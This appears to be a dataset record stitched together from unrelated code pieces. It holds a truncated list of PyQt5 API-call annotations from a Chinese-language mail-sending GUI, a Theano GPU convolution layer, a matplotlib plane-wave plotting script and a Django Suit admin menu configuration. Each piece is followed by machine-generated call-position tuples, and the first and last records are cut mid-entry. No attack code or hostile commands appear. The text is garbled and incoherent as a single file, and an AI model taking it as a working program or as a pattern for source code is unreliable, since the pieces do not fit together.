'"""./"""', '"""Annex Files (*.jpg *.png *.zip)"""'], {}), "(self, '選取檔案', './',\n 'Annex Files (*.jpg *.png *.zip)')\n", (15952, 16011), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((18931, 18999), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Eml Files (*.eml)"""'], {}), "(self, '選取檔案', './', 'Eml Files (*.eml)')\n", (18958, 18999), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((19081, 19102), 'mylibrary.genmail.get_msg', 'gm.get_msg', (['file_name'], {}), '(file_name)\n', (19091, 19102), True, 'import mylibrary.genmail as gm\n'), ((22664, 22687), 'PyQt5.QtWidgets.QApplication.instance', 'QApplication.instance', ([], {}), '()\n', (22685, 22687), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((1069, 1103), 'qdarkstyle.load_stylesheet_pyqt5', 'qdarkstyle.load_stylesheet_pyqt5', ([], {}), '()\n', (1101, 1103), False, 'import qdarkstyle, sys\n'), ((1141, 1154), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""收件人"""'], {}), "('收件人')\n", (1147, 1154), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2107, 2141), 'qdarkstyle.load_stylesheet_pyqt5', 'qdarkstyle.load_stylesheet_pyqt5', ([], {}), '()\n', (2139, 2141), False, 'import qdarkstyle, sys\n'), ((5815, 5842), 'PyQt5.QtCore.QDateTime.currentDateTime', 'QDateTime.currentDateTime', ([], {}), '()\n', (5840, 5842), False, 'from PyQt5.QtCore import Qt, QDateTime\n'), ((11920, 11933), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\n', (11926, 11933), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((12968, 12982), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""查詢 :"""'], {}), "('查詢 :')\n", (12974, 12982), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((13447, 13471), 'copy.deepcopy', 'deepcopy', (['self.data_logs'], {}), '(self.data_logs)\n', (13455, 13471), False, 'from copy import deepcopy\n'), ((15075, 15141), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""儲存成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '儲存成功!', QMessageBox.Ok)\n", (15098, 15141), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((17899, 17969), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""請確認有無 SMTP 資料!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '請確認有無 SMTP 資料!', QMessageBox.Ok)\n", (17918, 17969), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((19891, 19963), 'PyQt5.QtWidgets.QFileDialog.getSaveFileName', 'QFileDialog.getSaveFileName', (['self', '"""另存為..."""', '"""./"""', '"""Excel Files (*.eml)"""'], {}), "(self, '另存為...', './', 'Excel Files (*.eml)')\n", (19918, 19963), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((20123, 20189), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""儲存成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '儲存成功!', QMessageBox.Ok)\n", (20146, 20189), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((22463, 22528), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""缺少資料"""', '"""請確認是否有資料可以下載"""', 'QMessageBox.Ok'], {}), "(self, '缺少資料', '請確認是否有資料可以下載', QMessageBox.Ok)\n", (22482, 22528), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((9197, 9210), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\n', (9203, 9210), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((10310, 10323), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\n', (10316, 10323), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((11182, 11195), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\n', (11188, 11195), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((13358, 13368), 'server.database.Database', 'Database', ([], {}), '()\n', (13366, 13368), False, 'from server.database import Database\n'), ((14464, 14528), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""資料庫連結失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '資料庫連結失敗!', QMessageBox.Ok)\n", (14483, 14528), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15172, 15233), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""儲存失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\n", (15191, 15233), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((16755, 16763), 'server.client.Client', 'Client', ([], {}), '()\n', (16761, 16763), False, 'from server.client import Client\n'), ((16933, 17001), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""排程設定成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '排程設定成功!', QMessageBox.Ok)\n", (16956, 17001), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((17326, 17426), 'GenAndSendMail.insert_send_mail', 'insert_send_mail', (['eml_type', 'eml_file', 'user_group', 'mail_excel', 'sm', 'db'], {'annex': 'annex_file', 'url': 'url'}), '(eml_type, eml_file, user_group, mail_excel, sm, db, annex=\n annex_file, url=url)\n', (17342, 17426), False, 'from GenAndSendMail import insert_send_mail\n'), ((17519, 17587), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""信件寄出成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)\n", (17542, 17587), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((17616, 17679), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""信件寄出失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)\n", (17635, 17679), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((18773, 18836), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""信件寄出失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)\n", (18792, 18836), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((19762, 19798), 'mylibrary.genmail.gen_eml', 'gm.gen_eml', (['header', 'html', 'annex_file'], {}), '(header, html, annex_file)\n', (19772, 19798), True, 'import mylibrary.genmail as gm\n'), ((19838, 19862), 'mylibrary.genmail.gen_eml', 'gm.gen_eml', (['header', 'html'], {}), '(header, html)\n', (19848, 19862), True, 'import mylibrary.genmail as gm\n'), ((20036, 20064), 'email.generator.Generator', 'generator.Generator', (['outfile'], {}), '(outfile)\n', (20055, 20064), False, 'from email import generator\n'), ((20218, 20279), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""儲存失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\n", (20237, 20279), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((22015, 22088), 'PyQt5.QtWidgets.QFileDialog.getSaveFileName', 'QFileDialog.getSaveFileName', (['self', '"""另存為..."""', '"""./"""', '"""Excel Files (*.xlsx)"""'], {}), "(self, '另存為...', './', 'Excel Files (*.xlsx)')\n", (22042, 22088), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((22172, 22202), 'pandas.DataFrame', 'DataFrame', (['self.data_temp_logs'], {}), '(self.data_temp_logs)\n', (22181, 22202), False, 'from pandas import DataFrame\n'), ((22272, 22338), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""儲存成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '儲存成功!', QMessageBox.Ok)\n", (22295, 22338), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((17150, 17156), 'server.sendmail.Smtp', 'Smtp', ([], {}), '()\n', (17154, 17156), False, 'from server.sendmail import Smtp\n'), ((17298, 17308), 'server.database.Database', 'Database', ([], {}), '()\n', (17306, 17308), False, 'from server.database import Database\n'), ((18503, 18589), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Warning!"""', "('信件寄出成功!\\nWaning: ' + error)", 'QMessageBox.Ok'], {}), "(self, 'Warning!', '信件寄出成功!\\nWaning: ' + error,\n QMessageBox.Ok)\n", (18522, 18589), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((18626, 18694), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""信件寄出成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)\n", (18649, 18694), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((20429, 20440), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (20438, 20440), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((22375, 22436), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""儲存失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\n", (22394, 22436), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((14893, 14904), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (14902, 14904), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((14992, 15003), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', ([], {}), '()\n', (15001, 15003), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((21802, 21823), 'PyQt5.QtGui.QColor', 'QColor', (['(144)', '(182)', '(240)'], {}), '(144, 182, 240)\n', (21808, 21823), False, 'from PyQt5.QtGui import QPalette, QColor, QBrush\n'), ((14354, 14375), 'PyQt5.QtGui.QColor', 'QColor', (['(144)', '(182)', '(240)'], {}), '(144, 182, 240)\n', (14360, 14375), False, 'from PyQt5.QtGui import QPalette, QColor, QBrush\n')] |
"""
GpuCorrMM-based convolutional layers
"""
import numpy as np
import theano
import theano.tensor as T
from theano.sandbox.cuda.basic_ops import gpu_contiguous
from theano.sandbox.cuda.blas import GpuCorrMM
from .. import init
from .. import nonlinearities
from . import base
# base class for all layers that rely on GpuCorrMM directly
class MMLayer(base.Layer):
pass
class Conv2DMMLayer(MMLayer):
def __init__(self, input_layer, num_filters, filter_size, strides=(1, 1), border_mode=None, untie_biases=False,
W=init.Uniform(), b=init.Constant(0.), nonlinearity=nonlinearities.rectify, pad=None,
flip_filters=False):
super(Conv2DMMLayer, self).__init__(input_layer)
if nonlinearity is None:
self.nonlinearity = nonlinearities.identity
else:
self.nonlinearity = nonlinearity
self.num_filters = num_filters
self.filter_size = filter_size
self.strides = strides
self.untie_biases = untie_biases
self.flip_filters = flip_filters
if border_mode is not None and pad is not None:
raise RuntimeError("You cannot specify both 'border_mode' and 'pad'. To avoid ambiguity, please specify only one of them.")
elif border_mode is None and pad is None:
# no option specified, default to valid mode
self.pad = (0, 0)
elif border_mode is not None:
if border_mode == 'valid':
self.pad = (0, 0)
elif border_mode == 'full':
self.pad = (self.filter_size[0] - 1, self.filter_size[1] -1)
elif border_mode == 'same':
# only works for odd filter size, but the even filter size case is probably not worth supporting.
self.pad = ((self.filter_size[0] - 1) // 2, (self.filter_size[1] - 1) // 2)
else:
raise RuntimeError("Unsupported border_mode for Conv2DMMLayer: %s" % border_mode)
else:
self.pad = pad
self.W = self.create_param(W, self.get_W_shape())
if b is None:
self.b = None
elif self.untie_biases:
output_shape = self.get_output_shape()
self.b = self.create_param(b, (num_filters, output_shape[2], output_shape[3]))
else:
self.b = self.create_param(b, (num_filters,))
self.corr_mm_op = GpuCorrMM(subsample=self.strides, pad=self.pad)
def get_W_shape(self):
num_input_channels = self.input_layer.get_output_shape()[1]
return (self.num_filters, num_input_channels, self.filter_size[0], self.filter_size[1])
def get_params(self):
return [self.W] + self.get_bias_params()
def get_bias_params(self):
return [self.b] if self.b is not None else []
def get_output_shape_for(self, input_shape):
batch_size = input_shape[0]
input_width, input_height = input_shape[2:4]
output_width = (input_width + 2*self.pad[0] - self.filter_size[0]) // self.strides[0] + 1
output_height = (input_height + 2*self.pad[1] - self.filter_size[1]) // self.strides[1] + 1
return (batch_size, self.num_filters, output_width, output_height)
def get_output_for(self, input, *args, **kwargs):
filters = self.W
if self.flip_filters:
filters = filters[:, :, ::-1, ::-1] # flip width, height
contiguous_filters = gpu_contiguous(filters)
contiguous_input = gpu_contiguous(input)
conved = self.corr_mm_op(contiguous_input, contiguous_filters)
if self.b is None:
activation = conved
elif self.untie_biases:
activation = conved + self.b.dimshuffle('x', 0, 1, 2)
else:
activation = conved + self.b.dimshuffle('x', 0, 'x', 'x')
return self.nonlinearity(activation)
| [
"theano.sandbox.cuda.basic_ops.gpu_contiguous",
"theano.sandbox.cuda.blas.GpuCorrMM"
] | [((2405, 2452), 'theano.sandbox.cuda.blas.GpuCorrMM', 'GpuCorrMM', ([], {'subsample': 'self.strides', 'pad': 'self.pad'}), '(subsample=self.strides, pad=self.pad)\n', (2414, 2452), False, 'from theano.sandbox.cuda.blas import GpuCorrMM\n'), ((3436, 3459), 'theano.sandbox.cuda.basic_ops.gpu_contiguous', 'gpu_contiguous', (['filters'], {}), '(filters)\n', (3450, 3459), False, 'from theano.sandbox.cuda.basic_ops import gpu_contiguous\n'), ((3487, 3508), 'theano.sandbox.cuda.basic_ops.gpu_contiguous', 'gpu_contiguous', (['input'], {}), '(input)\n', (3501, 3508), False, 'from theano.sandbox.cuda.basic_ops import gpu_contiguous\n')] |
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import sys
sys.path.append("../")
from quelea import *
nx = 217
ny = 133
x0 = 0
x1 = 30 # lambdas
y0 = 0
y1 = 20 # lambdas
xs = np.linspace(x0, x1, nx)
ys = np.linspace(y0, y1, ny)
# 2d array of (x, y, z, t)
coords = np.array( [ [x, y, 0, 0] for x in xs for y in ys ] )
# for map_fields function this should be converted from 2D to 1D array
coords = coords.reshape((4 * nx * ny,))
ftype = 1 # plane wave
a0 = 1 # normalized field amplitude
omega = 1 # frequency
fparam = [a0, 1, 0, 0, 0, 1, 0, 0, omega] # parameters of the plane wave
ex, ey, ez, bx, by, bz = map_fields(coords, ftype, fparam)
# now convert to 2d arrays
ex = ex.reshape((nx, ny))
ey = ey.reshape((nx, ny))
ez = ez.reshape((nx, ny))
bx = bx.reshape((nx, ny))
by = by.reshape((nx, ny))
bz = bz.reshape((nx, ny))
ex = ex.transpose()
ey = ey.transpose()
ez = ez.transpose()
bx = bx.transpose()
by = by.transpose()
bz = bz.transpose()
plt.imshow(ey, cmap = 'RdYlBu', origin = 'lower', extent = [x0, x1, y0, y1])
plt.colorbar()
plt.clim(-a0, a0)
plt.savefig("map_fields.pdf")
| [
"matplotlib.pyplot.imshow",
"matplotlib.pyplot.clim",
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.colorbar",
"numpy.array",
"numpy.linspace",
"sys.path.append"
] | [((81, 103), 'sys.path.append', 'sys.path.append', (['"""../"""'], {}), "('../')\n", (96, 103), False, 'import sys\n'), ((201, 224), 'numpy.linspace', 'np.linspace', (['x0', 'x1', 'nx'], {}), '(x0, x1, nx)\n', (212, 224), True, 'import numpy as np\n'), ((230, 253), 'numpy.linspace', 'np.linspace', (['y0', 'y1', 'ny'], {}), '(y0, y1, ny)\n', (241, 253), True, 'import numpy as np\n'), ((291, 339), 'numpy.array', 'np.array', (['[[x, y, 0, 0] for x in xs for y in ys]'], {}), '([[x, y, 0, 0] for x in xs for y in ys])\n', (299, 339), True, 'import numpy as np\n'), ((974, 1044), 'matplotlib.pyplot.imshow', 'plt.imshow', (['ey'], {'cmap': '"""RdYlBu"""', 'origin': '"""lower"""', 'extent': '[x0, x1, y0, y1]'}), "(ey, cmap='RdYlBu', origin='lower', extent=[x0, x1, y0, y1])\n", (984, 1044), True, 'import matplotlib.pyplot as plt\n'), ((1051, 1065), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (1063, 1065), True, 'import matplotlib.pyplot as plt\n'), ((1066, 1083), 'matplotlib.pyplot.clim', 'plt.clim', (['(-a0)', 'a0'], {}), '(-a0, a0)\n', (1074, 1083), True, 'import matplotlib.pyplot as plt\n'), ((1085, 1114), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""map_fields.pdf"""'], {}), "('map_fields.pdf')\n", (1096, 1114), True, 'import matplotlib.pyplot as plt\n')] |
from django.conf import settings
from suit import apps
from suit.apps import DjangoSuitConfig
from suit.menu import ParentItem, ChildItem
APP_NAME = settings.APP_NAME
WIKI_URL = settings.WIKI_URL
class SuitConfig(DjangoSuitConfig):
name = 'suit'
verbose_name = 'Mbiome Core JAXid Generator'
site_title = 'Mbiome Core JAXid Tracking'
site_header = site_title
index_title = verbose_name
layout = 'vertical'
list_per_page = 35
# header_date_format = 'l, d-M-o'
# header_time_format = 'H:i e'
menu = (
ParentItem('JAX Id Record Lists',
use_first_child_url=True,
url='',
children=[
ChildItem('JAXid Records', model='id_generate.jaxiddetail'),
ChildItem(model='id_generate.boxid'),
ChildItem(model='id_generate.plateid'),
],
icon='fa fa-list-ul'),
ParentItem('Reference Data',
use_first_child_url=True,
url='',
children=[
ChildItem(model='id_generate.projectcode'),
ChildItem(model='id_generate.nucleicacidtype'),
ChildItem(model='id_generate.sampletype'),
ChildItem(model='id_generate.sequencingtype'),
],
icon='fa fa-list'),
ParentItem(
label='Generate new JAXid''s',
url=f'/{APP_NAME}/manage/id_generate/jaxiddetail/import/',
permissions='id_generate.change_jaxiddetail',
icon='fa fa-rocket'),
ParentItem(
label='Generate new Box ID''s',
url=f'/{APP_NAME}/manage/id_generate/boxid/import/',
permissions='id_generate.change_boxid',
icon='fa fa-cube'),
ParentItem(
label='Generate new Plate ID''s',
url=f'/{APP_NAME}/manage/id_generate/plateid/import/',
permissions='id_generate.change_plateid',
icon='fa fa-circle-o-notch'),
ParentItem(
label='Authorization',
children=[
ChildItem('Staff', model='auth.user'),
ChildItem(model='auth.group'),
ChildItem(model='admin.logentry'),
],
icon='fa fa-user-circle'),
ParentItem(
label='SOP and Request Sheet',
use_first_child_url=False,
url='',
children=[
ChildItem('View JAX ID Request SOP',
target_blank=True,
url=f'{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx'),
ChildItem('View JAX ID Request Template Sheet',
url=f'{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx'),
],
icon='fa fa-file'),
)
# menu_handler = None
menu_show_home = False
# Show changelist top actions only if any row is selected
toggle_changelist_top_actions = False
# # Enables two column layout for change forms with submit row on the right
form_submit_on_right = False
# Hide name/"original" column for all tabular inlines.
# May be overridden in Inline class by suit_form_inlines_hide_original = False
#form_inlines_hide_original = False
form_size = {
'default': apps.SUIT_FORM_SIZE_LARGE,
'widgets': {
'AutosizedTextarea': apps.SUIT_FORM_SIZE_X_LARGE,
'Textarea': apps.SUIT_FORM_SIZE_X_LARGE,
},
}
# form_size setting can be overridden in ModelAdmin using suit_form_size parameter
#
# Example:
# ----------------------------------------------
# suit_form_size = {
# 'default': 'col-xs-12 col-sm-2', 'col-xs-12 col-sm-10',
# 'fields': {
# 'field_name': SUIT_FORM_SIZE_LARGE,
# 'field_name2': SUIT_FORM_SIZE_X_LARGE,
# },
# 'widgets': {
# 'widget_class_name': SUIT_FORM_SIZE_FULL,
# 'AdminTextareaWidget': SUIT_FORM_SIZE_FULL,
# },
# 'fieldsets': {
# 'fieldset_name': SUIT_FORM_SIZE_FULL,
# 'fieldset_name2': SUIT_FORM_SIZE_FULL,
# }
# }
| [
"suit.menu.ChildItem",
"suit.menu.ParentItem"
] | [((1411, 1586), 'suit.menu.ParentItem', 'ParentItem', ([], {'label': '"""Generate new JAXids"""', 'url': 'f"""/{APP_NAME}/manage/id_generate/jaxiddetail/import/"""', 'permissions': '"""id_generate.change_jaxiddetail"""', 'icon': '"""fa fa-rocket"""'}), "(label='Generate new JAXids', url=\n f'/{APP_NAME}/manage/id_generate/jaxiddetail/import/', permissions=\n 'id_generate.change_jaxiddetail', icon='fa fa-rocket')\n", (1421, 1586), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1657, 1819), 'suit.menu.ParentItem', 'ParentItem', ([], {'label': '"""Generate new Box IDs"""', 'url': 'f"""/{APP_NAME}/manage/id_generate/boxid/import/"""', 'permissions': '"""id_generate.change_boxid"""', 'icon': '"""fa fa-cube"""'}), "(label='Generate new Box IDs', url=\n f'/{APP_NAME}/manage/id_generate/boxid/import/', permissions=\n 'id_generate.change_boxid', icon='fa fa-cube')\n", (1667, 1819), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1890, 2068), 'suit.menu.ParentItem', 'ParentItem', ([], {'label': '"""Generate new Plate IDs"""', 'url': 'f"""/{APP_NAME}/manage/id_generate/plateid/import/"""', 'permissions': '"""id_generate.change_plateid"""', 'icon': '"""fa fa-circle-o-notch"""'}), "(label='Generate new Plate IDs', url=\n f'/{APP_NAME}/manage/id_generate/plateid/import/', permissions=\n 'id_generate.change_plateid', icon='fa fa-circle-o-notch')\n", (1900, 2068), False, 'from suit.menu import ParentItem, ChildItem\n'), ((703, 762), 'suit.menu.ChildItem', 'ChildItem', (['"""JAXid Records"""'], {'model': '"""id_generate.jaxiddetail"""'}), "('JAXid Records', model='id_generate.jaxiddetail')\n", (712, 762), False, 'from suit.menu import ParentItem, ChildItem\n'), ((784, 820), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.boxid"""'}), "(model='id_generate.boxid')\n", (793, 820), False, 'from suit.menu import ParentItem, ChildItem\n'), ((842, 880), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.plateid"""'}), "(model='id_generate.plateid')\n", (851, 880), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1098, 1140), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.projectcode"""'}), "(model='id_generate.projectcode')\n", (1107, 1140), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1162, 1208), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.nucleicacidtype"""'}), "(model='id_generate.nucleicacidtype')\n", (1171, 1208), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1230, 1271), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.sampletype"""'}), "(model='id_generate.sampletype')\n", (1239, 1271), False, 'from suit.menu import ParentItem, ChildItem\n'), 